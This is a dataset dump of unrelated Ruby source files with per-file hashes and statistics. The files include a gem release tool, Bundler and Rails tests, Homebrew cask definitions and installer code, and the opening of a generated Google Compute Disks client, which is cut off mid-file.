61bfca8a11205d61e46144817f145166f8b696f3 | 4,952 | # frozen_string_literal: true
desc "Releases pending gems for a pull request"
long_desc \
"This tool continues the releases associated with a release pull request." \
" It is normally used to retry or continue releases that aborted due to" \
" an error. This tool is normally called from a GitHub Actions workflow," \
" but can also be executed locally if the proper credentials are present."
required_arg :release_pr, accept: Integer do
desc "Release pull request number. Required."
end
flag_group desc: "Flags" do
flag :gh_pages_dir, "--gh-pages-dir=VAL" do
desc "The directory to use for the gh-pages branch"
long_desc \
"Set to the path of a directory to use as the gh-pages workspace when" \
" building and pushing gem documentation. If left unset, a temporary" \
" directory will be created (and removed when finished)."
end
flag :git_remote, "--git-remote=VAL" do
default "origin"
desc "The name of the git remote"
long_desc \
"The name of the git remote pointing at the canonical repository." \
" Defaults to 'origin'."
end
flag :sha, "--sha=VAL" do
desc "Override the SHA for the release"
long_desc \
"The SHA to release from. This can be used if additional commits" \
" needed to be done to fix the release. If not given, the merge SHA" \
" of the pull request is used."
end
flag :rubygems_api_key, "--rubygems-api-key=VAL" do
desc "Set the Rubygems API key"
long_desc \
"Use the given Rubygems API key when pushing to Rubygems. Required if" \
" and only if there is no current setting in the home Rubygems configs."
end
flag :skip_checks, "--[no-]skip-checks" do
desc "Disable pre-release checks"
long_desc \
"If set, all pre-release checks are disabled. This may occasionally be" \
" useful to repair a broken release, but is generally not recommended."
end
flag :enable_releases, "--enable-releases=VAL" do
default "true"
desc "Control whether to enable releases."
long_desc \
"If set to 'true', releases will be enabled. Any other value will" \
" result in dry-run mode, meaning it will go through the motions," \
" create a GitHub release, and update the release pull request if" \
" applicable, but will not actually push the gem to Rubygems or push" \
" the docs to gh-pages."
end
flag :yes, "--yes", "-y" do
desc "Automatically answer yes to all confirmations"
end
end
include :exec, exit_on_nonzero_status: true
include :terminal, styled: true
def run
require "release_utils"
require "release_performer"
::Dir.chdir(context_directory)
@utils = ReleaseUtils.new(self)
[:gh_pages_dir, :rubygems_api_key].each do |key|
set(key, nil) if get(key).to_s.empty?
end
verify_release_pr
setup_git
perform_pending_releases
cleanup_git
end
def verify_release_pr
@pr_info = @utils.load_pr(release_pr)
@utils.error("Could not load pull request ##{release_pr}") unless @pr_info
expected_labels = [@utils.release_pending_label, @utils.release_error_label]
return if @pr_info["labels"].any? { |label| expected_labels.include?(label["name"]) }
warning = "PR #{release_pr} doesn't have the release pending or release error label."
if yes
logger.warn(warning)
return
end
unless confirm("#{warning} Proceed anyway? ", :bold, default: false)
@utils.error("Release aborted.")
end
end
def perform_pending_releases
performer = create_performer
github_check_errors = skip_checks ? [] : @utils.wait_github_checks
if github_check_errors.empty?
@utils.released_gems_and_versions(@pr_info).each do |gem_name, gem_version|
if performer.instance(gem_name, gem_version).perform
puts("SUCCESS: Released #{gem_name} #{gem_version}", :bold, :green)
end
end
else
performer.add_extra_errors(github_check_errors)
end
if performer.report_results
puts("All releases completed successfully", :bold, :green)
else
@utils.error("Releases reported failure")
end
end
def setup_git
@original_branch = @utils.current_branch
merge_sha = @pr_info["merge_commit_sha"]
release_sha = sha || merge_sha
exec(["git", "fetch", "--depth=1", "origin", release_sha])
exec(["git", "fetch", "--depth=2", "origin", merge_sha])
exec(["git", "checkout", release_sha])
end
def cleanup_git
exec(["git", "checkout", @original_branch]) if @original_branch
end
def create_performer
dry_run = /^t/i =~ enable_releases.to_s ? false : true
ReleasePerformer.new(@utils,
skip_checks: skip_checks,
rubygems_api_key: rubygems_api_key,
git_remote: git_remote,
gh_pages_dir: gh_pages_dir,
gh_token: ::ENV["GITHUB_TOKEN"],
pr_info: @pr_info,
check_exists: true,
dry_run: dry_run)
end
| 34.873239 | 87 | 0.681543 |
2662c129538f4f740211dca3a6d5382e4f16c94c | 3,120 | # frozen_string_literal: true
RSpec.describe "bundle install with :allow_offline_install" do
before do
bundle "config set allow_offline_install true"
end
context "with no cached data locally" do
it "still installs" do
skip "corrupt test gem" if Gem.win_platform?
install_gemfile! <<-G, :artifice => "compact_index"
source "http://testgemserver.local"
gem "rack-obama"
G
expect(the_bundle).to include_gem("rack 1.0")
end
it "still fails when the network is down" do
install_gemfile <<-G, :artifice => "fail"
source "http://testgemserver.local"
gem "rack-obama"
G
expect(err).to include("Could not reach host testgemserver.local.")
expect(the_bundle).to_not be_locked
end
end
context "with cached data locally" do
it "will install from the compact index" do
skip "corrupt test gem" if Gem.win_platform?
system_gems ["rack-1.0.0"], :path => :bundle_path
bundle! "config set clean false"
install_gemfile! <<-G, :artifice => "compact_index"
source "http://testgemserver.local"
gem "rack-obama"
gem "rack", "< 1.0"
G
expect(the_bundle).to include_gems("rack-obama 1.0", "rack 0.9.1")
gemfile <<-G
source "http://testgemserver.local"
gem "rack-obama"
G
bundle! :update, :artifice => "fail", :all => true
expect(last_command.stdboth).to include "Using the cached data for the new index because of a network error"
expect(the_bundle).to include_gems("rack-obama 1.0", "rack 1.0.0")
end
def break_git_remote_ops!
FileUtils.mkdir_p(tmp("broken_path"))
File.open(tmp("broken_path/git"), "w", 0o755) do |f|
f.puts strip_whitespace(<<-RUBY)
#!/usr/bin/env ruby
if %w(fetch --force --quiet --tags refs/heads/*:refs/heads/*).-(ARGV).empty? || %w(clone --bare --no-hardlinks --quiet).-(ARGV).empty?
warn "git remote ops have been disabled"
exit 1
end
ENV["PATH"] = ENV["PATH"].sub(/^.*?:/, "")
exec("git", *ARGV)
RUBY
end
old_path = ENV["PATH"]
ENV["PATH"] = "#{tmp("broken_path")}:#{ENV["PATH"]}"
yield if block_given?
ensure
ENV["PATH"] = old_path if block_given?
end
it "will install from a cached git repo" do
skip "doesn't print errors" if Gem.win_platform?
git = build_git "a", "1.0.0", :path => lib_path("a")
update_git("a", :path => git.path, :branch => "new_branch")
install_gemfile! <<-G
gem "a", :git => #{git.path.to_s.dump}
G
break_git_remote_ops! { bundle! :update, :all => true }
expect(err).to include("Using cached git data because of network errors")
expect(the_bundle).to be_locked
break_git_remote_ops! do
install_gemfile! <<-G
gem "a", :git => #{git.path.to_s.dump}, :branch => "new_branch"
G
end
expect(err).to include("Using cached git data because of network errors")
expect(the_bundle).to be_locked
end
end
end
| 31.515152 | 144 | 0.605769 |
ab44d37bebf16be599847516c4156322feb75a90 | 1,678 | cask 'keybase' do
version '1.0.47-20180508010858,c06519b740'
sha256 'd58d857a72d5710c68b42fb7432d11e46edb6e393fc66d0e5961b4ba4be26bb4'
url "https://prerelease.keybase.io/darwin-updates/Keybase-#{version.before_comma}%2B#{version.after_comma}.zip"
appcast 'https://prerelease.keybase.io/update-darwin-prod-v2.json',
checkpoint: 'a2ca0b317f0217e88d8aae454fda13f51bd842b37f515639ae568de9ce459c08'
name 'Keybase'
homepage 'https://keybase.io/'
auto_updates true
app 'Keybase.app'
postflight do
system_command "#{appdir}/Keybase.app/Contents/SharedSupport/bin/keybase",
args: ['install-auto']
end
uninstall delete: '/Library/PrivilegedHelperTools/keybase.Helper',
launchctl: 'keybase.Helper',
login_item: 'Keybase',
signal: [
['TERM', 'keybase.Electron'],
['TERM', 'keybase.ElectronHelper'],
['KILL', 'keybase.Electron'],
['KILL', 'keybase.ElectronHelper'],
],
script: {
executable: "#{appdir}/Keybase.app/Contents/SharedSupport/bin/keybase",
args: ['uninstall'],
}
zap trash: [
'~/Library/Application Support/Keybase',
'~/Library/Caches/Keybase',
'~/Library/Group Containers/keybase',
'~/Library/Logs/Keybase*',
'~/Library/Logs/keybase*',
'~/Library/Preferences/keybase*',
'/Library/Logs/keybase*',
],
rmdir: '/keybase'
end
| 37.288889 | 113 | 0.557211 |
ff2b04db66853cfcdf8fbd28e0e6d2e45a03b17e | 247 | class BadChecksum < TestCask
version '1.2.3'
sha256 'badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb'
url TestHelper.local_binary_url('caffeine.zip')
homepage 'http://example.com/local-caffeine'
app 'Caffeine.app'
end
| 24.7 | 75 | 0.793522 |
4a4a25ea5318fcf9492ff9bd4e329118713bc5fc | 1,253 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module FarmersMarkets
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 34.805556 | 82 | 0.775738 |
187c88b96004c2912b2d47a4e9fa30e7c4eac3f3 | 2,038 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe "binary sequence store" do
it "should be able to load sequences" do
path = File.join TEST_DATA_DIR, '1', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs[1].should == 'CACTTATCTCTACCAAAGATCACGATTTAGAATCAAACTATAAAGTTTTAGAAGATAAAGTAACAACTTATACATGGGGA'
seqs[77].should == 'CCTGTACCTGGAAGTGAAATACCAGCATAGTTTTTAATTTGTACATTAAATAATACATTGCCATCATTCATAGTAATATTATTTATTATACTTCCAGCTTCATTGCCATTAGTTACAGATATAGTTGCTTGACCAGTATACTCTCCATTATCATCTTTTTGAGCTGTTATAGTAACTTTTACTGGTTCTTTTAAAAGGCTATACCCTTTAGGAGCTTTTTCTTCTTTTATAAAGTAATCTCCTTCTTTTAAACCAGTAAATATAACTCGTCCATTTTTATCAGTTACACCCTTTCCTTTTAATAAAACCACATTTCCAGTAGAATCATACGTATATTTACCAATTACAT'
end
it "should be #length" do
path = File.join TEST_DATA_DIR, '1', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs.length.should == 77
end
it 'should respect array boundaries' do
path = File.join TEST_DATA_DIR, '1', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
expect {
seqs[0]
}.to raise_error
expect {
seqs[78]
}.to raise_error
end
it 'should be able to understand mates' do
path = File.join TEST_DATA_DIR, '2', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs.is_second_in_pair?(1).should == false
seqs.is_second_in_pair?(2).should == true
seqs.is_second_in_pair?(5).should == false
seqs.pair_id(1).should == 2
seqs.pair_id(2).should == 1
seqs.pair_id(5).should == 6
seqs.pair_id(6).should == 5
end
it 'should be able to understand non-mates and mates in the same run' do
path = File.join TEST_DATA_DIR, '5_singles_and_pairs', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs.pair_id(1).should == nil
seqs.pair_id(50000).should == nil
seqs.pair_id(50001).should == 50002
seqs.pair_id(100000).should == 99999
end
end
| 41.591837 | 374 | 0.748773 |
1cdbfe08a49726ac96e328811617ada44baaa0ef | 1,461 | module HeadlineChoice
def get_headlines(source)
@headlines = []
case source.to_s
when "espn"
self.scrape_espn
get_choice("espn")
when "mlb"
self.scrape_mlb
get_choice("mlb")
when "cbs"
self.scrape_cbs
get_choice("cbs")
when "fox"
self.scrape_fox
get_choice("fox")
end
end
def get_choice(source)
puts "\033[0;36mWhich story would you like to read?\033[0m"
puts "0. Back to the main menu"
@headlines.each.with_index(1) do |headline, i|
puts "#{i}. #{headline.title}"
end
case source
when "espn"
get_source = "espn_stories"
when "nfl"
get_source = "mlb_stories"
when "cbs"
get_source = "cbs_stories"
when "fox"
get_source = "fox_stories"
end
input = gets.strip.downcase
if input == "0"
puts ""
CLI.new.call
elsif input == "1"
Story.send(get_source, @headlines[0].url)
elsif input == "2"
Story.send(get_source, @headlines[1].url)
elsif input == "3"
Story.send(get_source, @headlines[2].url)
elsif input == "4"
Story.send(get_source, @headlines[3].url)
elsif input == "5"
Story.send(get_source, @headlines[4].url)
else
puts ""
puts "\033[0;33mInvalid entry...\033[0m"
get_choice(source)
end
end
end | 24.762712 | 65 | 0.546201 |
336ac9f314192a87625b99aa8036d3aacbe47ac2 | 767 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
def setup
@base_title = 'Post Blog Service'
end
test 'should get root' do
get root_path
assert_response :success
end
test 'should get home' do
get root_path
assert_response :success
assert_select 'title', 'Post Blog Service'
end
test 'should get help' do
get help_path
assert_response :success
assert_select 'title', "Help | #{@base_title}"
end
test 'should get about' do
get about_path
assert_response :success
assert_select 'title', "About | #{@base_title}"
end
test 'should get contact' do
get contact_path
assert_response :success
assert_select 'title', "Contact | #{@base_title}"
end
end
| 23.242424 | 65 | 0.70013 |
1cb4da6273db9e9dbf86e33539fbfd52626bbb20 | 42 | module LunarShell
VERSION = "0.5.2"
end
| 10.5 | 19 | 0.690476 |
6284d1b1d50ed46d76ca0bb2d28d71e0168f8c35 | 969 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2019_07_22_181356) do
create_table "posts", force: :cascade do |t|
t.string "title"
t.text "description"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 42.130435 | 86 | 0.768834 |
ed69a5f5cecb5028148db1fe0aac15ecbf70e268 | 17,138 | # typed: false
# frozen_string_literal: true
require "formula_installer"
require "unpack_strategy"
require "utils/topological_hash"
require "cask/config"
require "cask/download"
require "cask/staged"
require "cask/quarantine"
require "cgi"
module Cask
# Installer for a {Cask}.
#
# @api private
class Installer
extend T::Sig
extend Predicable
# TODO: it is unwise for Cask::Staged to be a module, when we are
# dealing with both staged and unstaged casks here. This should
# either be a class which is only sometimes instantiated, or there
# should be explicit checks on whether staged state is valid in
# every method.
include Staged
def initialize(cask, command: SystemCommand, force: false,
skip_cask_deps: false, binaries: true, verbose: false,
zap: false, require_sha: false, upgrade: false,
installed_as_dependency: false, quarantine: true,
verify_download_integrity: true, quiet: false)
@cask = cask
@command = command
@force = force
@skip_cask_deps = skip_cask_deps
@binaries = binaries
@verbose = verbose
@zap = zap
@require_sha = require_sha
@reinstall = false
@upgrade = upgrade
@installed_as_dependency = installed_as_dependency
@quarantine = quarantine
@verify_download_integrity = verify_download_integrity
@quiet = quiet
end
attr_predicate :binaries?, :force?, :skip_cask_deps?, :require_sha?,
:reinstall?, :upgrade?, :verbose?, :zap?, :installed_as_dependency?,
:quarantine?, :quiet?
def self.caveats(cask)
odebug "Printing caveats"
caveats = cask.caveats
return if caveats.empty?
Homebrew.messages.record_caveats(cask.token, caveats)
<<~EOS
#{ohai_title "Caveats"}
#{caveats}
EOS
end
sig { params(quiet: T.nilable(T::Boolean), timeout: T.nilable(T.any(Integer, Float))).void }
def fetch(quiet: nil, timeout: nil)
odebug "Cask::Installer#fetch"
verify_has_sha if require_sha? && !force?
download(quiet: quiet, timeout: timeout)
satisfy_dependencies
end
def stage
odebug "Cask::Installer#stage"
Caskroom.ensure_caskroom_exists
extract_primary_container
save_caskfile
rescue => e
purge_versioned_files
raise e
end
def install
start_time = Time.now
odebug "Cask::Installer#install"
old_config = @cask.config
if @cask.installed? && !force? && !reinstall? && !upgrade?
return if quiet?
raise CaskAlreadyInstalledError, @cask
end
check_conflicts
print caveats
fetch
uninstall_existing_cask if reinstall?
backup if force? && @cask.staged_path.exist? && @cask.metadata_versioned_path.exist?
oh1 "Installing Cask #{Formatter.identifier(@cask)}"
opoo "macOS's Gatekeeper has been disabled for this Cask" unless quarantine?
stage
@cask.config = @cask.default_config.merge(old_config)
install_artifacts
::Utils::Analytics.report_event("cask_install", @cask.token) unless @cask.tap&.private?
purge_backed_up_versioned_files
puts summary
end_time = Time.now
Homebrew.messages.package_installed(@cask.token, end_time - start_time)
rescue
restore_backup
raise
end
def check_conflicts
return unless @cask.conflicts_with
@cask.conflicts_with[:cask].each do |conflicting_cask|
if (match = conflicting_cask.match(HOMEBREW_TAP_CASK_REGEX))
conflicting_cask_tap = Tap.fetch(match[1], match[2])
next unless conflicting_cask_tap.installed?
end
conflicting_cask = CaskLoader.load(conflicting_cask)
raise CaskConflictError.new(@cask, conflicting_cask) if conflicting_cask.installed?
rescue CaskUnavailableError
next # Ignore conflicting Casks that do not exist.
end
end
def reinstall
odebug "Cask::Installer#reinstall"
@reinstall = true
install
end
def uninstall_existing_cask
return unless @cask.installed?
# use the same cask file that was used for installation, if possible
installed_caskfile = @cask.installed_caskfile
installed_cask = begin
installed_caskfile.exist? ? CaskLoader.load(installed_caskfile) : @cask
rescue CaskInvalidError # could be thrown by call to CaskLoader#load with outdated caskfile
@cask # default
end
# Always force uninstallation, ignore method parameter
cask_installer = Installer.new(installed_cask, verbose: verbose?, force: true, upgrade: upgrade?)
zap? ? cask_installer.zap : cask_installer.uninstall
end
sig { returns(String) }
def summary
s = +""
s << "#{Homebrew::EnvConfig.install_badge} " unless Homebrew::EnvConfig.no_emoji?
s << "#{@cask} was successfully #{upgrade? ? "upgraded" : "installed"}!"
s.freeze
end
sig { returns(Download) }
def downloader
@downloader ||= Download.new(@cask, quarantine: quarantine?)
end
sig { params(quiet: T.nilable(T::Boolean), timeout: T.nilable(T.any(Integer, Float))).returns(Pathname) }
def download(quiet: nil, timeout: nil)
# Store cask download path in cask to prevent multiple downloads in a row when checking if it's outdated
@cask.download ||= downloader.fetch(quiet: quiet, verify_download_integrity: @verify_download_integrity,
timeout: timeout)
end
def verify_has_sha
odebug "Checking cask has checksum"
return unless @cask.sha256 == :no_check
raise CaskError, <<~EOS
Cask '#{@cask}' does not have a sha256 checksum defined and was not installed.
This means you have the #{Formatter.identifier("--require-sha")} option set, perhaps in your HOMEBREW_CASK_OPTS.
EOS
end
def primary_container
@primary_container ||= begin
downloaded_path = download(quiet: true)
UnpackStrategy.detect(downloaded_path, type: @cask.container&.type, merge_xattrs: true)
end
end
def extract_primary_container(to: @cask.staged_path)
odebug "Extracting primary container"
odebug "Using container class #{primary_container.class} for #{primary_container.path}"
basename = downloader.basename
if (nested_container = @cask.container&.nested)
Dir.mktmpdir do |tmpdir|
tmpdir = Pathname(tmpdir)
primary_container.extract(to: tmpdir, basename: basename, verbose: verbose?)
FileUtils.chmod_R "+rw", tmpdir/nested_container, force: true, verbose: verbose?
UnpackStrategy.detect(tmpdir/nested_container, merge_xattrs: true)
.extract_nestedly(to: to, verbose: verbose?)
end
else
primary_container.extract_nestedly(to: to, basename: basename, verbose: verbose?)
end
return unless quarantine?
return unless Quarantine.available?
Quarantine.propagate(from: primary_container.path, to: to)
end
def install_artifacts
artifacts = @cask.artifacts
already_installed_artifacts = []
odebug "Installing artifacts"
odebug "#{artifacts.length} #{"artifact".pluralize(artifacts.length)} defined", artifacts
artifacts.each do |artifact|
next unless artifact.respond_to?(:install_phase)
odebug "Installing artifact of class #{artifact.class}"
next if artifact.is_a?(Artifact::Binary) && !binaries?
artifact.install_phase(command: @command, verbose: verbose?, force: force?)
already_installed_artifacts.unshift(artifact)
end
save_config_file
save_download_sha if @cask.version.latest?
rescue => e
begin
already_installed_artifacts.each do |artifact|
if artifact.respond_to?(:uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.post_uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
ensure
purge_versioned_files
raise e
end
end
# TODO: move dependencies to a separate class,
# dependencies should also apply for `brew cask stage`,
# override dependencies with `--force` or perhaps `--force-deps`
def satisfy_dependencies
return unless @cask.depends_on
macos_dependencies
arch_dependencies
cask_and_formula_dependencies
end
def macos_dependencies
return unless @cask.depends_on.macos
return if @cask.depends_on.macos.satisfied?
raise CaskError, @cask.depends_on.macos.message(type: :cask)
end
def arch_dependencies
return if @cask.depends_on.arch.nil?
@current_arch ||= { type: Hardware::CPU.type, bits: Hardware::CPU.bits }
return if @cask.depends_on.arch.any? do |arch|
arch[:type] == @current_arch[:type] &&
Array(arch[:bits]).include?(@current_arch[:bits])
end
raise CaskError,
"Cask #{@cask} depends on hardware architecture being one of " \
"[#{@cask.depends_on.arch.map(&:to_s).join(", ")}], " \
"but you are running #{@current_arch}."
end
def collect_cask_and_formula_dependencies
return @cask_and_formula_dependencies if @cask_and_formula_dependencies
graph = ::Utils::TopologicalHash.graph_package_dependencies(@cask)
raise CaskSelfReferencingDependencyError, cask.token if graph[@cask].include?(@cask)
::Utils::TopologicalHash.graph_package_dependencies(primary_container.dependencies, graph)
begin
@cask_and_formula_dependencies = graph.tsort - [@cask]
rescue TSort::Cyclic
strongly_connected_components = graph.strongly_connected_components.sort_by(&:count)
cyclic_dependencies = strongly_connected_components.last - [@cask]
raise CaskCyclicDependencyError.new(@cask.token, cyclic_dependencies.to_sentence)
end
end
def missing_cask_and_formula_dependencies
collect_cask_and_formula_dependencies.reject do |cask_or_formula|
installed = if cask_or_formula.respond_to?(:any_version_installed?)
cask_or_formula.any_version_installed?
else
cask_or_formula.try(:installed?)
end
installed && (cask_or_formula.respond_to?(:optlinked?) ? cask_or_formula.optlinked? : true)
end
end
def cask_and_formula_dependencies
return if installed_as_dependency?
formulae_and_casks = collect_cask_and_formula_dependencies
return if formulae_and_casks.empty?
missing_formulae_and_casks = missing_cask_and_formula_dependencies
if missing_formulae_and_casks.empty?
puts "All formula dependencies satisfied."
return
end
ohai "Installing dependencies: #{missing_formulae_and_casks.map(&:to_s).join(", ")}"
missing_formulae_and_casks.each do |cask_or_formula|
if cask_or_formula.is_a?(Cask)
if skip_cask_deps?
opoo "`--skip-cask-deps` is set; skipping installation of #{cask_or_formula}."
next
end
Installer.new(
cask_or_formula,
binaries: binaries?,
verbose: verbose?,
installed_as_dependency: true,
force: false,
).install
else
fi = FormulaInstaller.new(
cask_or_formula,
**{
show_header: true,
installed_as_dependency: true,
installed_on_request: false,
verbose: verbose?,
}.compact,
)
fi.prelude
fi.fetch
fi.install
fi.finish
end
end
end
def caveats
self.class.caveats(@cask)
end
def save_caskfile
old_savedir = @cask.metadata_timestamped_path
return if @cask.source.blank?
savedir = @cask.metadata_subdir("Casks", timestamp: :now, create: true)
(savedir/"#{@cask.token}.rb").write @cask.source
old_savedir&.rmtree
end
def save_config_file
@cask.config_path.atomic_write(@cask.config.to_json)
end
def save_download_sha
@cask.download_sha_path.atomic_write(@cask.new_download_sha) if @cask.checksumable?
end
def uninstall
oh1 "Uninstalling Cask #{Formatter.identifier(@cask)}"
uninstall_artifacts(clear: true)
if !reinstall? && !upgrade?
remove_download_sha
remove_config_file
end
purge_versioned_files
purge_caskroom_path if force?
end
def remove_config_file
FileUtils.rm_f @cask.config_path
@cask.config_path.parent.rmdir_if_possible
end
def remove_download_sha
FileUtils.rm_f @cask.download_sha_path if @cask.download_sha_path.exist?
end
def start_upgrade
uninstall_artifacts
backup
end
def backup
@cask.staged_path.rename backup_path
@cask.metadata_versioned_path.rename backup_metadata_path
end
def restore_backup
return if !backup_path.directory? || !backup_metadata_path.directory?
Pathname.new(@cask.staged_path).rmtree if @cask.staged_path.exist?
Pathname.new(@cask.metadata_versioned_path).rmtree if @cask.metadata_versioned_path.exist?
backup_path.rename @cask.staged_path
backup_metadata_path.rename @cask.metadata_versioned_path
end
def revert_upgrade
opoo "Reverting upgrade for Cask #{@cask}"
restore_backup
install_artifacts
end
def finalize_upgrade
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
purge_backed_up_versioned_files
puts summary
end
def uninstall_artifacts(clear: false)
artifacts = @cask.artifacts
odebug "Uninstalling artifacts"
odebug "#{artifacts.length} #{"artifact".pluralize(artifacts.length)} defined", artifacts
artifacts.each do |artifact|
if artifact.respond_to?(:uninstall_phase)
odebug "Uninstalling artifact of class #{artifact.class}"
artifact.uninstall_phase(
command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?,
)
end
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Post-uninstalling artifact of class #{artifact.class}"
artifact.post_uninstall_phase(
command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?,
)
end
end
def zap
ohai "Implied `brew uninstall --cask #{@cask}`"
uninstall_artifacts
if (zap_stanzas = @cask.artifacts.select { |a| a.is_a?(Artifact::Zap) }).empty?
opoo "No zap stanza present for Cask '#{@cask}'"
else
ohai "Dispatching zap stanza"
zap_stanzas.each do |stanza|
stanza.zap_phase(command: @command, verbose: verbose?, force: force?)
end
end
ohai "Removing all staged versions of Cask '#{@cask}'"
purge_caskroom_path
end
def backup_path
return if @cask.staged_path.nil?
Pathname("#{@cask.staged_path}.upgrading")
end
def backup_metadata_path
return if @cask.metadata_versioned_path.nil?
Pathname("#{@cask.metadata_versioned_path}.upgrading")
end
def gain_permissions_remove(path)
Utils.gain_permissions_remove(path, command: @command)
end
def purge_backed_up_versioned_files
# versioned staged distribution
gain_permissions_remove(backup_path) if backup_path&.exist?
# Homebrew Cask metadata
return unless backup_metadata_path.directory?
backup_metadata_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
backup_metadata_path.rmdir_if_possible
end
def purge_versioned_files
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
# versioned staged distribution
gain_permissions_remove(@cask.staged_path) if @cask.staged_path&.exist?
# Homebrew Cask metadata
if @cask.metadata_versioned_path.directory?
@cask.metadata_versioned_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
@cask.metadata_versioned_path.rmdir_if_possible
end
@cask.metadata_main_container_path.rmdir_if_possible unless upgrade?
# toplevel staged distribution
@cask.caskroom_path.rmdir_if_possible unless upgrade?
end
def purge_caskroom_path
odebug "Purging all staged versions of Cask #{@cask}"
gain_permissions_remove(@cask.caskroom_path)
end
end
end
| 31.16 | 120 | 0.664838 |
1a693a6793eca76bc85f16470b6930529ac37c1d | 71,334 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/compute/v1/compute_pb"
module Google
module Cloud
module Compute
module V1
module Disks
module Rest
##
# REST client for the Disks service.
#
# The Disks API.
#
class Client
include GrpcTranscoding
# @private
attr_reader :disks_stub
##
# Configure the Disks Client class.
#
# See {::Google::Cloud::Compute::V1::Disks::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all Disks clients:
#
# ::Google::Cloud::Compute::V1::Disks::Rest::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Compute", "V1"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the Disks Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Compute::V1::Disks::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new Disks REST client object.
#
# ## Examples
#
# To create a new Disks REST client with the default
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#
# To create a new Disks REST client with a custom
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Disks client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the REST modules only when it's required.
require "gapic/rest"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
credentials ||= Credentials.default scope: @config.scope
if credentials.is_a?(String) || credentials.is_a?(Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@client_stub = ::Gapic::Rest::ClientStub.new endpoint: @config.endpoint, credentials: credentials
end
# Service calls
##
# Adds existing resource policies to a disk. You can only add one policy which will be applied to this disk for scheduling snapshot creation.
#
# @overload add_resource_policies(request, options = nil)
# Pass arguments to `add_resource_policies` via a request object, either of type
# {::Google::Cloud::Compute::V1::AddResourcePoliciesDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AddResourcePoliciesDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
